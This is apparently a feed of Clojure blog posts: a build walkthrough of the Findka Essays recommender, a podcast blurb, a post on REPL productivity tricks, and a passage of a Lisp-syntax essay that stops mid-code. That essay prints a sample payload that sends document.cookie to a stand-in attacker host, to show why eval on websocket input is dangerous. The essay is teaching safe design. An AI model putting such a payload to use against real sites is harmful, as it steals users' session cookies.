Building an essay recommender system in 10 days

I recently finished the MVP for an idea I had last month: Findka Essays, a newsletter that adapts to your preferences with machine learning. I pivoted to this from a much more complicated recommender system app, so I was already familiar with (almost) all the parts needed to build it. I'm extremely happy with the result: the new app is simple, the codebase is clean, and I launched it in under two weeks. In the grand tradition of our people, it is now time for an architecture + toolkit walkthrough. Feel free to skip to whichever sections interest you most. If you read only one section, I suggest Recommendations.

Note: I've abstracted a lot of the code into Biff, a web framework I released several months ago. I'll reference Biff frequently.


Language

The vast majority of the app is written in Clojure (the only exception is the actual recommendation algorithm, which is written in Python). Clojure is a fabulous language that has a strong emphasis on simplicity and stability, which makes codebases easy to maintain and extend in the long run. As a Lisp, it also has an extremely tight feedback loop which is great for rapid development.

There is a trade-off: since Clojure focuses on long-term concerns over short-term concerns, it can take a while to get up to speed (though it's a lot easier if you have a mentor). For example, to do web dev in Clojure, you'll need to learn how to piece together a bunch of individual libraries—there isn't a go-to framework like Rails or Django. (Luminus is probably the best starting point, after you're familiar with the language itself).

In most cases, I'd say the trade-off is well worth it. But for small or experimental apps (like you might build in a startup), speed at the beginning is extra valuable. If you want to move fast right away but you're not already comfortable in the Clojure ecosystem, you might have a bad time. One of my goals for Biff is to help mitigate that.

Front end

OK, now for some actual code. Findka Essays, unlike its predecessor, is a humble multi-page application. No React here. So the front end is pretty simple.

(For brevity, I'll call it "Findka" from here on out).

I use Rum for HTML generation. Here's a quick example:

(ns hello.world
 (:require
   [rum.core :as rum]))

(defn -main []
  (spit "hello.html"
    (rum/render-static-markup
      [:html
       [:body
        [:p {:style {:color "red"}}
         "Hello world!"]]])))

After installing Clojure, you could put that in src/hello/world.clj and then run the program with clj -Sdeps '{:deps {rum/rum {:mvn/version "0.11.5"}}}' -M -m hello.world. That's a great way to get started with Clojure, actually—you can make a whole static site with just functions, data structures, and Rum. That's how I made Findka's landing page. Here's a snippet:

(defn home []
  (base-page {:scripts [[:script {:src "/js/ensure-logged-out.js"}]]}
    [:.bg-dark.text-white
     [:.container.px-3.mx-auto.max-w-screen-md
      [:.nunito-sans-bold.text-2xl.mt-4.mb-8.sm:text-center
       "Great essays delivered to your inbox. " [:br.hidden.md:inline]
       "Chosen specifically for you with machine learning."]
      [:a.btn.btn-green.btn-block.sm:max-w-sm.mx-auto
       {:href "/signup"}
       "Sign up"]
      ...

This project is the first time I've used Tailwind CSS (I used Bootstrap previously). I give it two thumbs up. Tailwind gives you smaller, better building blocks than Bootstrap, and it has responsive variants for every class (hallelujah). Setup was straightforward. After an npm init; npm install tailwindcss --save-dev, you just need a few files:

tailwind.config.js:

module.exports = {
  purge: [
    './src/**/*.clj', // for tree-shaking
  ],
  theme: {
    extend: {
      colors: {
        'dark': '#343a40',
        'hn-orange': '#ff6600',
        ...
      }
    }
  }
}

tailwind.css:

@tailwind base;

@tailwind components;
@responsive {
  .btn-thin {
    @apply text-center py-2 px-4 rounded;
  }
  .btn {
    @apply btn-thin font-bold;
  }
  ...
}

@tailwind utilities;
@responsive {
  .nunito-sans-bold {
    font-family: 'Nunito Sans', sans-serif;
    font-weight : 900;
  }
  ...
}

Build with npx tailwindcss build tailwind.css -o output.css.

The last piece is fonts. I am not a designer, at all. Despite this, I have recently made a startling discovery: using different fonts, instead of just the default, can actually make your site look a lot better. It turns out you can just doom scroll through Google Fonts until you find some you like. I did that for Findka's logo (I tried AI logo generators in the past, but they weren't good).

Authentication

Findka supports sign-in via email link or Google. Biff mostly handles email link auth for you. Just make a form with an email field that POSTs to /api/signup. Biff sends the user an email with a link, they click on it, boom. You have to provide an email template and a function that actually sends the email. I use Mailgun, so Findka's email function looks like this:

(def templates
  {:biff.auth/signup
   (fn [{:keys [biff.auth/link]}]
     {:from "Findka Essays <...>"
      :subject "Create your Findka Essays account"
      :html (rum/render-static-markup
              [:div
               [:p "We received a request to create a Findka Essays account using this email address."]
               [:p [:a {:href link :target "_blank"} "Click here to create your account."]]
               [:p "If you did not request this link, you can ignore this email."]])})
   ...})

(defn send** [api-key opts]
  (http/post (str "https://api.mailgun.net/v3/mail.findka.com/messages")
    {:basic-auth ["api" api-key]
     :form-params opts}))

(defn send* [{:keys [mailgun/api-key template data] :as opts}]
  (if (some? template)
    (let [template-fn (get templates template)
          mailgun-opts (template-fn data)]
      (send** api-key mailgun-opts))
    (send** api-key (select-keys opts [:to :subject :text :html]))))

(defn send [{:keys [params template recaptcha/secret-key] :as sys}]
  (if (= template :biff.auth/signup)
    (let [{:keys [success score]}
          (:body
            (http/post "https://www.google.com/recaptcha/api/siteverify"
              {:form-params {:secret secret-key
                             :response (:g-recaptcha-response params)}
               :as :json}))]
      (when (and success (<= 0.5 score))
        (send* sys)))
    (send* sys)))

As shown at the end, I use Recaptcha for bot control. It's nice because you don't have to make the user do anything; Google's script will simply give you a score that represents how likely the user is to be a human.

Biff doesn't have Google sign-in support built in (yet), but it's pretty simple to add. After the front-end bit is taken care of, you just have to add an HTTP endpoint that receives a token, verifies it using Google's library, and sets a session cookie.

That's sort of a funny way to use Google sign-in, I'll admit. You're "supposed" to send the token with every request and verify it each time, letting Google's code handle sessions on the client. However, Biff is already set up for authenticating requests via session cookie, and that's more convenient for multi-page applications anyway.
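
Biff doesn't ship that endpoint, so here's a rough sketch of what it could look like, assuming a Ring app with session middleware and verifying the token against Google's tokeninfo endpoint rather than their client library (the parameter name, redirect target, and session shape here are made up):

(ns example.google-signin
  (:require [clj-http.client :as http]))

(defn google-signin [{:keys [params]}]
  (let [{:keys [status body]}
        (http/get "https://oauth2.googleapis.com/tokeninfo"
                  {:query-params {:id_token (:id_token params)}
                   :as :json
                   :throw-exceptions false})]
    ;; tokeninfo returns a non-200 status for invalid or expired tokens. In a
    ;; real app you'd also check that :aud matches your OAuth client ID and
    ;; look up or create the user instead of storing the email directly.
    (if (= 200 status)
      {:status 302
       :headers {"Location" "/settings"}
       :session {:email (:email body)}} ; wrap-session persists this as a cookie
      {:status 403
       :body "Invalid token"})))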

CRUD

I use Crux for the database. Crux is an immutable document database with datalog queries. Another way to explain it is that Crux works well as a general-purpose database (e.g. a replacement for postgres), but it fits better with functional programming. You also get flexible data modeling without giving up query power.

(That ignores Crux's raison d'être, bitemporal queries—a cool feature, and no doubt extremely useful if you need them. For my simple applications, I haven't needed them.)
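
If you haven't seen Crux before, basic usage looks roughly like this (a throwaway in-memory node; the exact start-node options vary between Crux versions):

(require '[crux.api :as crux])

(with-open [node (crux/start-node {})]
  ;; Write a document; every document needs a :crux.db/id.
  (crux/await-tx node
    (crux/submit-tx node
      [[:crux.tx/put {:crux.db/id :essay-1
                      :url "https://example.com/essay"}]]))
  ;; Query it back with datalog.
  (crux/q (crux/db node)
          '{:find [e url]
            :where [[e :url url]]}))
;; => #{[:essay-1 "https://example.com/essay"]}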

Crux doesn't enforce any schema, but Biff does. You can specify schema using Clojure spec:

(require '[trident.util :as u])

(u/sdefs
  ::event-type #{:submit :email :click :like :dislike}
  ::timestamp  inst?
  ::url        string?
  ::parent     uuid?
  ::user       uuid?
  ::event      (u/only-keys
                 :req-un [::event-type
                          ::timestamp
                          ::user
                          ::url]
                 :opt-un [::parent]))

(def schema
  {:events {:spec [uuid? ::event]}})

This schema defines a "table" for events. The [uuid? ::event] part means that the primary key for an event document should be a UUID, and the rest of the document should conform to the spec given for ::event above. In this case, that means the document must have an event type, timestamp, user ID and URL, and it can optionally have a "parent" key (which is set to the primary key of another event).
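
To make that concrete, a document like the following would conform to the ::event spec and go in the :events table (the UUIDs and URL are placeholders):

{:event-type :click
 :timestamp  #inst "2020-10-01T12:00:00Z"
 :user       #uuid "7b4f1e5e-0000-0000-0000-000000000001"
 :url        "https://example.com/some-essay"
 :parent     #uuid "7b4f1e5e-0000-0000-0000-000000000002"}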

Like a standard multi-page app, Findka has POST endpoints for writing to the database and GET endpoints for reading (though I have no idea if the endpoints adhere to REST or not). Here's one for submitting an essay:

(defn submit-essay [{:keys [biff/node session/uid params] :as sys}]
  (if (nil? uid)
    {:status 302
     :headers/Location "/login/"}
    (do
      (crux/await-tx node
        (biff.crux/submit-tx sys
          {[:events] {:user uid
                      :timestamp :db/current-time
                      :event-type :submit
                      :url (:url params)}}))
      {:status 302
       :headers/Location "/settings"})))

(def routes
  [["/api/submit-essay"
   {:post submit-essay
    :name ::submit-essay
    :middleware [anti-forgery/wrap-anti-forgery]}]
   ...])

And here's a snippet from the /settings page. The call to crux/q performs a datalog query which returns the current user's 10 most recent events, which are displayed in the UI:

(defn settings* [{:keys [biff/db session/uid]}]
  (let [events (map first
                 (crux/q db
                   {:find '[event timestamp]
                    :full-results? true
                    :args [{'user uid}]
                    :order-by '[[timestamp :desc]]
                    :limit 10
                    :where '[[event :event-type]
                             [event :user user]
                             [event :timestamp timestamp]]}))]
    ...
    [:div
     [:.h-5]
     [:.nunito-sans-bold.text-lg "Recent activity"]
     (for [[i {:keys [event-type url timestamp]}] (map-indexed vector events)]
       [:.p-2.leading-snug {:class (when (odd? i) "bg-gray-200")}
        [:.text-xs.text-gray-700 timestamp]
        [:div (case event-type
                :submit  "Submitted: "
                :email   "Received: "
                :click   "Clicked: "
                :like    "Added to favorites: "
                :dislike "Show less like this: ")
         [:a.text-blue-600 {:href url :target "_blank"} url]]])]
    ...))

(defn settings [sys]
  {:body (rum/render-static-markup
           (static/base-page
             {:scripts [[:script {:src "https://apis.google.com/js/platform.js"}]
                        [:script {:src "/js/ensure-logged-in.js"}]
                        [:script {:src "/js/settings.js"}]]}
             (settings* sys)))
   :headers/content-type "text/html"})

(def routes
  [["/settings" {:get settings
                 :name ::settings
                 :middleware [anti-forgery/wrap-anti-forgery]}]
   ...])

Recommendations

And here we are; the whole reason that Findka exists. Findka sends you daily or weekly emails. Each one includes a list of links to essays (submitted by other users). Whenever you click a link, Findka saves it as an event. Over time, Findka learns what kinds of essays you like. Everyone's click data is combined into a model, which Findka uses to pick essays for you.

Most of the work is done by Surprise, a Python library that includes several different collaborative filtering algorithms. (That library is why I'm using Python at all instead of just Clojure—no need to reinvent the wheel). Findka uses the k-NN baseline algorithm. It looks for essays that are often liked by people who like the same essays as you. If there's not much data yet (as is the case right now, since Findka launched recently), it defaults to recommending essays that are the most liked in general.

I've added two additional layers. I call the first one "popularity smoothing." I sort all the essays by the number of times they've been recommended in the past, and I partition them into 10 bins. Whenever I pick an essay to send someone, I first choose a bin with uniform probability, and then I use k-NN to select an essay from that bin. Thus, the top 10% most popular essays will take up only 10% of the recommendations (if left unchecked, popular items can end up taking much more than their fair share of recommendations).
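
The real implementation lives in the Python script, but the idea is small enough to sketch. Here's a rough Clojure version of it, where rec-counts is a map of essay to times recommended and knn-pick stands in for the k-NN selection step (neither is Findka's actual code):

(defn pick-with-smoothing [essays rec-counts knn-pick]
  ;; Sort essays by how often they've been recommended, split them into ~10
  ;; equal bins, pick a bin uniformly at random, then let k-NN choose within it.
  (let [sorted   (sort-by #(get rec-counts % 0) essays)
        bin-size (max 1 (quot (count sorted) 10))
        bins     (partition-all bin-size sorted)]
    (knn-pick (rand-nth bins))))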

The other layer is for exploration vs. exploitation, which is the need to balance recommending relevant essays with recommending more diverse essays, in order to better learn the user's preferences. I use an "epsilon-greedy" strategy: for a fixed percentage of the time, I recommend a random essay instead of using k-NN. At the moment, that percentage is quite high: 50%. As Findka grows and accumulates more data, I'll likely turn the percentage down.
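
A sketch of that strategy in the same spirit (again not Findka's actual code):

(defn epsilon-greedy-pick [epsilon essays knn-pick]
  ;; With probability epsilon (currently 0.5), ignore the model and pick a
  ;; random essay; otherwise fall back to the k-NN pick.
  (if (< (rand) epsilon)
    (rand-nth (vec essays))
    (knn-pick essays)))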

Notably, I am not currently using content-based filtering. Often, article recommenders analyze the articles' text and use that to figure out which ones are similar. This makes a lot of sense for news, where you're always recommending new articles that may not have much user interaction data yet. However, Findka is intended for articles that stay relevant over time. We can afford to let articles build up clicks gradually before we recommend them to lots of users. Content-based filtering would likely still be helpful, so I'll experiment with it at some point.

To run the Python code, I simply call it as a subprocess from Clojure. First, I generate a CSV with all the user events. The Python code ingests the CSV and then spits out a different CSV that has a list of URLs for each user. From Clojure, I then send out emails with those URLs.

(require '[trident.util :as u])

(defn get-user->recs [db]
  (write-event-csv db)
  (u/sh "python3" (.getPath (io/resource "python/recommend.py")))
  (read-recommendation-csv))

I read the Python file from the JVM classpath, which makes deployment easy. I just include the file in my app's resources. For better scaling, I'll eventually move the Python code to a dedicated server.

Devops

This is my favorite section. Linux system administration always warms my heart, since messing around with Linux as a teenager played a huge part in my early computing education. I still remember the feeling of wonder that came after I learned shutdown -h now (at least, after I figured out that typing your password in the terminal doesn't make little asterisks show up). There was something about being able to interact with the system so directly that caught my attention.

Anyway. Findka runs on a DigitalOcean droplet. I use Packer and Terraform for provisioning, and I deploy code from Findka's git repository using tools.deps' git dependency feature.

For all my projects, I like to add a task bash script with the following form:

#!/bin/bash
set -e

foo () {
  ...
}

bar () {
  ...
}

"$@"

This way, you add build tasks by simply defining a new function. I put alias t='./task' in my .bashrc, so I can run a task with e.g. t foo.

Here is Findka's task file. I'll go through each of the tasks:

#!/bin/bash
set -e

init () {
  terraform init
}

build-image () {
  packer build -var "do_key=$DIGITALOCEAN_KEY" webserver.json
  curl -X GET -H "Authorization: Bearer $DIGITALOCEAN_KEY" \
       "https://api.digitalocean.com/v2/images?private=true" | jq
}

tf () {
  terraform $1 \
    -var "do_token=${DIGITALOCEAN_KEY}" \
    -var "github_deploy_key=$GITHUB_DEPLOY_KEY"
}

dev () {
  BIFF_ENV=dev clj -m biff.core
}

css () {
  npx tailwindcss build tailwind.css -o resources/www/findka-essays/css/custom.css
}

css-prod () {
  NODE_ENV=production css
}

deploy () {
  git push origin master
  scp config.edn biff@essays.findka.com:config.edn
  scp blank-prod-deps.edn biff@essays.findka.com:deps.edn
  ssh biff@essays.findka.com systemctl restart biff
  ssh biff@essays.findka.com journalctl -u biff -f
}

prod-connect () {
  ssh -NL 7800:localhost:7888 biff@essays.findka.com
}

"$@"

init: not much to say. You have to run this once.

build-image: this sets up an Ubuntu image for the DigitalOcean droplet. Here's the config file, webserver.json:

{
  "builders": [
    {
      "monitoring": true,
      "type": "digitalocean",
      "size": "s-1vcpu-1gb",
      "region": "nyc1",
      "ssh_username": "root",
      "image": "ubuntu-20-04-x64",
      "api_token": "{{user `do_key`}}",
      "private_networking": true,
      "snapshot_name": "findka-essays-webserver"
    }
  ],
  "provisioners": [
    {
      "type": "shell",
      "script": "./provision.sh"
    }
  ],
  "variables": {
    "do_key": ""
  },
  "sensitive-variables": [
    "do_key"
  ]
}

provision.sh is a ~100 line script that:

  1. Installs packages (Clojure, Nginx, Python Surprise, Certbot)
  2. Sets up a non-root user
  3. Creates a Systemd service which starts the app on boot
  4. Configures Nginx, Letsencrypt, and a firewall

After Packer finishes, the build-image task prints out the ID for the newly created image, which Terraform needs.

tf: this task deploys infrastructure according to a webserver.tf file. Here's a snippet:

...

resource "digitalocean_droplet" "webserver" {
    image = "<image ID from the build-image task>"
    name = "findka-essays-webserver"
    region = "nyc1"
    size = "s-1vcpu-1gb"
    private_networking = true
    ssh_keys = [
      data.digitalocean_ssh_key.Jacob.id
    ]
    connection {
      host = self.ipv4_address
      user = "root"
      type = "ssh"
      timeout = "2m"
    }
    provisioner "file" {
      source = "config.edn"
      destination = "/home/biff/config.edn"
    }
    provisioner "file" {
      content = var.github_deploy_key
      destination = "/home/biff/.ssh/id_rsa"
    }
}

...

Not shown is some configuration for DNS records and a managed Postgres database, which Crux uses for persistence.

dev, css: these are used for local development. After some code is finished, I run css-prod and then commit. If I were using CI/CD, I'd have it build the CSS artifact instead of committing it to git.

deploy: the funnest task. It pushes to git, copies over a gitignored config file (which includes secrets, like API keys), deploys the new code, and then watches the logs.

Clojure has a feature where you can depend on a git repository. When you start your app, Clojure will clone the repo and add its code to the classpath. You normally need to specify a commit hash, but if you omit it, you can run a command to fetch the hash of the latest commit. The scp blank-prod-deps.edn ... line copies over a deps.edn file that relies on exactly that:

{:deps
 {github-jacobobryant/findka-essays
  {:git/url "git@github.com:jacobobryant/findka.git",
   :tag "HEAD",
   :deps/root "essays"}}}

After running ssh biff@essays.findka.com systemctl restart biff, the Systemd service will fetch the latest commit hash (which was just pushed to master), add it to the dependency file, and start the application. (This works with private repos, by the way: that's why Terraform copies my Github deploy key to the server). This causes roughly a minute of downtime, but that's fine for Findka's scale.

The last task, prod-connect, lets you run arbitrary Clojure code over the wire. It's kind of like SSHing in to your server and running psql so you can query your production database, but it's more powerful: you can run Clojure code in the running production app's JVM process. Thanks to Clojure's late binding, you can even redefine functions—like an HTTP handler—and have the new definitions take effect immediately. All from the comfort of your favorite text editor (Vim, right?).
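
Normally your editor handles the connection, but to make it concrete: with the tunnel from prod-connect running, any nREPL client can evaluate forms in the production JVM via localhost:7800. A minimal sketch using the nrepl.core client:

(require '[nrepl.core :as nrepl])

(with-open [conn (nrepl/connect :port 7800)]
  (-> (nrepl/client conn 5000)          ; 5000 ms response timeout
      (nrepl/message {:op "eval" :code "(+ 1 2)"})
      nrepl/response-values))
;; => [3]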

When I first launched Findka, I used this feature to send out emails manually for a couple days, before adding it to a cron job. I have a Clojure namespace that looks like this:

(ns findka.essays.admin
  (:require
    [trident.util :as u]
    ...))

(defn get-email-data [db]
  ...)

(comment
  (u/pprint
    (let [{:keys [biff/node] :as sys} @biff.core/system
          db (crux/db node)]
      (get-email-data db))))

If I put my cursor on u/pprint and then type cpp while prod-connect is running, it will execute that code on the server. So I can print out the data that will be passed to my email-sending function without actually sending the emails. If something looks wrong in the data, I can modify the get-email-data function and re-run it without having to run the deploy task. When everything's good, I run a different function that sends the emails.

In general, this is great for:

  • debugging production issues
  • low-effort, high-power "admin dashboard"
  • back-end feature dev in prod (I don't recommend doing this if you're part of a team, but that's one of the advantages of being a solo developer: there's no one to hear you scream, er, stop you)

Analytics

The last piece of the puzzle. Since Findka already saves events whenever someone submits an article or clicks a link in an email, I use those to calculate daily active users and other stats. I have a daily cron job (not an actual cron job, just a recurring task scheduled by chime) that queries for all the events, prints out a plain text table with stats, and emails it to me.

(defn print-usage-report [{:keys [db now]}]
  (let [events (map first
                 (crux/q db
                   {:find '[doc]
                    :full-results? true
                    :where '[[doc :event-type event-type]
                             [(== event-type #{:like :dislike :click :submit})]
                             [doc :user]]}))
        ...]
    (u/print-table
      [[:t "Day     "]
       [:signups "Conversions"]
       [:returning "Returning users"]]
      (for [t ts
            :let [users (get day->users t)
                  signups (get day->signups t)
                  returning (count (filter #(not= t (user->first-day %)) users))]]
        {:t (u/format-date t "dd MMM")
         :signups signups
         :returning returning}))
    ...))
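
For reference, scheduling that recurring task with chime looks roughly like this (assuming the jarohen/chime 2.x API; send-usage-report! is a placeholder for the query/print/email steps above):

(require '[chime.core :as chime])
(import '(java.time Instant Duration))

(defn send-usage-report! [time]
  ;; placeholder: query the events, print the table, email it to me
  (println "sending usage report for" time))

;; Fires once a day starting now; chime-at returns a closeable schedule.
(defonce usage-report-schedule
  (chime/chime-at
    (chime/periodic-seq (Instant/now) (Duration/ofDays 1))
    send-usage-report!))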

That doesn't cover page hits, so I also use Simple Analytics. However, it wouldn't be hard to add some custom JS to each page that sends the current URL and the referrer to an endpoint, which saves it as another event. I'll probably do that at some point. Then I could add page hits to my daily analytics emails, including landing page conversion rate.


Well, diligent reader, I congratulate you for sticking with me until the end. Give Findka a try and let me know what you think. Also let me know if you'd like to use this development stack for your own projects. I'm planning on doing a lot more work on Biff soon. Biff already includes parts of this stack, but not all.

Permalink

Dragan Djuric - Cognicast Episode 154

In this episode, we talk to Dragan Djuric about deep learning, AI and writing technical books.

Our Guest, Dragan Djuric

Topics

SUBSCRIBING TO THE COGNICAST

The show is available on iTunes! You can also subscribe to the podcast using our podcast feed.

You can send feedback about the show to podcast@cognitect.com, or leave a comment here on the blog. Thanks for listening!

CREDITS

Permalink

Clojure Power Tools Part 1

IntelliJ IDEA and Cursive

Introduction

I have been working at Metosin for some months now and I'm learning new Clojure tricks almost every day. I list here some of my favorite Clojure tricks that I have learned either from various Clojure presentations or at Metosin. I know that for a newcomer Clojure might be a bit of a weird language, and newcomers usually don't know the simple productivity tricks. Hopefully, this post makes it a bit easier for newcomers to start being productive with Clojure.

Start Doing It

If you are a complete newcomer in the Clojure land, I have one recommendation: Just start doing it. Choose an editor, install the required tools, and start learning. The most important thing is that you start learning with a Clojure REPL, and with an editor that has good integration with the Clojure REPL. There are several options:

I believe those are the most used editors with good REPL integrations, at least according to the latest State of Clojure.

If you are a complete newcomer, a good idea is to choose an editor that you already know. Install the REPL plugin for that editor and learn to use it. Especially learn how to send forms (Clojure expressions) from the editor to the REPL for evaluation.

Once you have a working development environment, start learning Clojure. A good resource is Brave Clojure. And remember to do the exercises and experiments with your editor and send the forms to the REPL for evaluation using your hotkey!

Use a REPL Scratch File

I believe that newcomers often write their experiments directly in the REPL window; at least I did. Don't do it. Instead, create a scratch file and write your experiments there. I watched a Stuart Halloway presentation in which he mentioned that he has a dedicated Clojure directory in which he has written all his Clojure experiments for several years - it must be pretty nice to be able to grep it when looking for something you wrote years ago. I have another habit. I have this in my ~/.clojure/deps.edn file:

{
 :aliases {
           :kari {:extra-paths ["scratch"]
                  :extra-deps {hashp/hashp {:mvn/version "0.1.1"}
                               com.gfredericks/debug-repl {:mvn/version "0.0.11"}
                               djblue/portal {:mvn/version "0.6.1"}
                               }
                  }
           }
 }

Focus on the row :kari {:extra-paths ["scratch"]. This line adds the scratch directory to the classpath in any project in which I add my personal alias kari, e.g.:

clj -M:dev:test:common:backend:kari -m nrepl.cmdline -i -C

That is, all projects have various aliases that you need to use when starting the REPL. I just add my personal alias kari at the end, and then I'm able to create a scratch.clj file in that scratch directory and write all project-specific Clojure experimentation there. I think this is also nice because I have all my project-related Clojure experimentation in one place. Below is a screenshot from my IntelliJ IDEA showing the scratch directory and two scratch files: one for backend experimentation (scratch.clj - content showing in the editor window) and one for frontend experimentation (scratch-cljs.cljs).

Scratch directory in IntelliJ IDEA

Rich Comments

Clojurians use so-called rich comments. These are typically small code snippets at the end of the file, wrapped in a comment form. This way the code inside the rich comment is valid Clojure that is read by the Clojure reader but not evaluated. Therefore you can put all kinds of namespace-specific experimentation or code examples in the rich comment block. An example from one of my exercises, domain_postgres.clj:

(comment
  (simpleserver.test-config/go)
  (simpleserver.test-config/halt)
  (simpleserver.test-config/test-env)
  (let [db (get-in (simpleserver.test-config/test-env) [:service :domain :db])]
    (sql-get-products db {:pg-id (str 2)}))
  (let [db (get-in (simpleserver.test-config/test-env) [:service :domain :db])]
    (sql-get-product db {:pg-id (str 2) :p-id (str 4)}))
  )

Those rich comments make it pretty easy to remember things later on. E.g. in the above-mentioned example I have some functions to start/halt the Integrant test state and some functions in which I test some SQL operations in the domain using the database connection from the test state.

Use Defs Inside Functions When Debugging

This is a classic Clojure trick. If you are wondering what is happening inside some function - just take a snapshot of the most important entities in that function. Let’s look at the same file, domain_postgres.clj:

(if-let [kv (sql-get-product db {:pg-id (str pg-id) :p-id (str p-id)})]

I wonder what kind of data structure is returned from the function and bound to kv? Let’s see:

    (if-let [kv (sql-get-product db {:pg-id (str pg-id) :p-id (str p-id)})]
      (let [_ (def todo-kv kv)]
        [(:id kv)

The magic is in the let I added: (let [_ (def todo-kv kv)]: we just create a var (todo-kv) and bind the value of kv to it.

Then let’s run the tests so that this function gets called and after the test let’s examine todo-kv:

todo-kv
=>
{:id "4",
 :pg_id "2",
 :title "Test Once Upon a Time in the West",
 :price 14.40M,
 :a_or_d "Leone",
 :year 1968,
 :country "Italy-USA",
 :g_or_l "Western"}

Use Hashp for Printing Values

Sometimes you want to preserve the data structure and examine it in your scratch file - then the def trick described in the previous chapter is all you need. But sometimes you just want to see the value. You could use e.g. clojure.pprint to print the value of the var but there is another nice power tool for it: hashp. E.g. in your rich comment evaluate: (require '[hashp.core]) and then add #p before the function you are interested in, e.g.:

(if-let [kv #p (sql-get-product db {:pg-id (str pg-id) :p-id (str p-id)})]

Evaluate the namespace (or reset Integrant state or something similar) and run the tests and you will see an output like:

Testing simpleserver.service.domain.domain-test
#p[simpleserver.service.domain.domain-postgres.PostgresR/fn:37] (sql-get-product db {:p-id (str p-id), :pg-id (str pg-id)}) => 
{:a_or_d "Leone",
 :country "Italy-USA",
 :g_or_l "Western",
 :id "4",
 :pg_id "2",
 :price 14.40M,
 :title "Test Once Upon a Time in the West",
 :year  1968}

Use Portal to Visualize Data

This is pretty cool and I learned this only this week from one Metosin Clojure guru (aah, I need to remember to write a chapter: “Find a Clojure Shop”).

If you have a complex domain in which you have a lot of data with a lot of children and those children having children and so on - it is a bit daunting to try to visualize this in the REPL output window or using the REPL to navigate in the data. portal to the rescue!

Write the following forms in your scratch file or in the rich comment of your namespace - I’ll use the same domain_postgres.clj file as an example.

  (require '[portal.api :as portal-api])
  (portal.api/open)
  (portal.api/tap)
  (tap> (let [db (get-in (simpleserver.test-config/test-env) [:service :domain :db])]
          (sql-get-products db {:pg-id (str 2)})))

So, the (portal.api/open) opens the visualization window, (portal.api/tap) adds portal as a tap, and then using tap> you can send data to the visualization window. See example:

IntelliJ IDEA and Cursive

This is a very simple example. But imagine that there are hundreds of lines of data, vectors, maps, more vectors and maps inside them, etc. A visualization tool like Portal is a must-have. There are other similar visualization tools - Clojure itself ships with one nowadays: clojure.inspector.
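
For example, inspect-tree pops up a Swing window with an expandable tree view of whatever nested data you hand it (the data below is just a placeholder):

(require '[clojure.inspector :as inspector])

(inspector/inspect-tree
  {:products [{:id "4" :title "Test Once Upon a Time in the West"}
              {:id "2" :title "Test Gladiator"}]})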

Find a Clojure Shop

If you really want to learn Clojure, I strongly recommend finding a job in which you are able to spend 8 hours every work day with Clojure - with other seasoned Clojurians. I really can't overemphasize how important this is. I learned the basics of Clojure alone, just reading books, googling stuff, doing exercises. I had a long career in the corporate world, and one day I realized that I had paid my mortgage, my kids were adults, and I could basically do whatever I liked with my life - and I asked myself: what do you really want to do? I realized that I want to do Clojure & cloud projects. I contacted the most prominent Clojure shops in Finland and got a job at the best of them, Metosin. Damn, it's been a jolly ride with Metosin. The company is full of world-class Clojurians; just look at some extremely popular Metosin libraries like reitit. And I got a chance to work on the same project with the guys who build these libraries. I should be paying them instead of the company paying me. What incredible luck. In a few months I have already learned so much from these guys. And I'm learning more and more every day.

So. If you really want to learn Clojure, it is really, really important to find a great Clojure shop where you can learn from the best.

Conclusions

There are a lot of other Clojure tricks and tools - maybe I’ll write “Clojure Power Tools Part 2” blog post in the future.

The writer works at Metosin, using Clojure in cloud projects. If you are interested in starting a Clojure project in Finland or in getting Clojure training in Finland, you can contact me by sending an email to my Metosin email address or via LinkedIn.

Kari Marttila

Permalink

An Intuition for Lisp Syntax

Every lisp hacker I ever met, myself included, thought that all those brackets in Lisp were off-putting and weird. At first, of course. Soon after we all came to the same epiphany: lisp’s power lies in those brackets! In this essay, we’ll go on a journey to that epiphany.

Draw

Say we were creating a program that let you draw stuff. If we wrote this in JavaScript, we might have functions like this:

drawPoint({x: 0, y: 1}, 'yellow')
drawLine({x: 0, y: 0}, {x: 1, y: 1}, 'blue')
drawCircle(point, radius, 'red')
rotate(shape, 90)
...

So far, so cool.

Challenge

Now, here’s a challenge: Can we support remote drawing?

This means that a user would be able to “send” instructions to your screen, and you would see their drawing come to life.

How could we do it?

Well, say we set up a websocket connection. We could receive instructions from the user like this:

websocket.onMessage(data => { 
  /* TODO */ 
})

Eval

To make it work off the bat, one option could be to take code strings as input:

websocket.onMessage(data => {
  eval(data)
})

Now the user could send "drawLine({x: 0, y: 0}, {x: 1, y: 1}, 'red')" and bam: we’ll draw a line!

But…your spidey sense may already be tingling. What if the user was malicious and managed to send us an instruction like this:

"window.location=&aposhttp://iwillp3wn.com?user_info=&apos + document.cookie"

Uh oh…our cookie would get sent to iwillp3wn.com, and the malicious user would indeed pwn us. We can’t use eval; it’s too dangerous.

There lies our problem: we can’t use eval, but we need some way to receive arbitrary instructions.

An initial idea

Well, we could represent those instructions as JSON. We can map each JSON instruction to a special function, and that way we can control what runs. Here’s one way we can represent it:

{
  instructions: [
    { functionName: "drawLine", args: [{ x: 0, y: 0 }, { x: 1, y: 1 }, "blue"] },
  ];
}

This JSON would translate to drawLine({x: 0, y: 0}, {x: 1, y: 1}, "blue")

We could support this pretty simply. Here’s how our onMessage could look:

websocket.onMessage(data => {
  const fns = {
    drawLine: drawLine,
    ...
  };
  data.instructions.forEach((ins) => fns[ins.functionName](...ins.args));
})

That seems like it would work!

An initial simplification

Let’s see if we can clean this up. Here’s our JSON:

{
  instructions: [
    { functionName: "drawLine", args: [{ x: 0, y: 0 }, { x: 1, y: 1 }, "blue"] },
  ];
}

Well, since every instruction has a functionName, and an args, we don’t really need to spell that out. We could write it like this:

{
  instructions: [["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }, "blue"]],
}

Nice! We changed our object in favor of an array. To handle that, all we need is a rule: the first part of our instruction is the function name, and the rest are arguments. If we wrote that down, here’s how our onMessage would look:

websocket.onMessage(data => { 
  const fns = {
    drawLine: drawLine,
    ...
  };
  data.instructions.forEach(([fName, ...args]) => fns[fName](...args));
})

And bam, drawLine would work again!

More power

So far, we only used drawLine:

drawLine({x: 0, y: 0}, {x: 1, y: 1}, 'blue')
// same as
["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }]

But what if we wanted to express something more powerful:

rotate(drawLine({x: 0, y: 0}, {x: 1, y: 1}, 'blue'), 90)

Looking at that, we can translate it to an instruction like this:

["rotate", ["drawLine", { x: 0, y: 0 }, { x: 1, y: 1 }], 90]

Here, the rotate instruction has an argument that is in itself an instruction! Pretty powerful. Surprisingly, we just need to tweak our code a tiny bit to make it work:

websocket.onMessage(data => { 
  const fns = {
    drawLine: drawLine,
    ...
  };
  const parseInstruction = (ins) => {
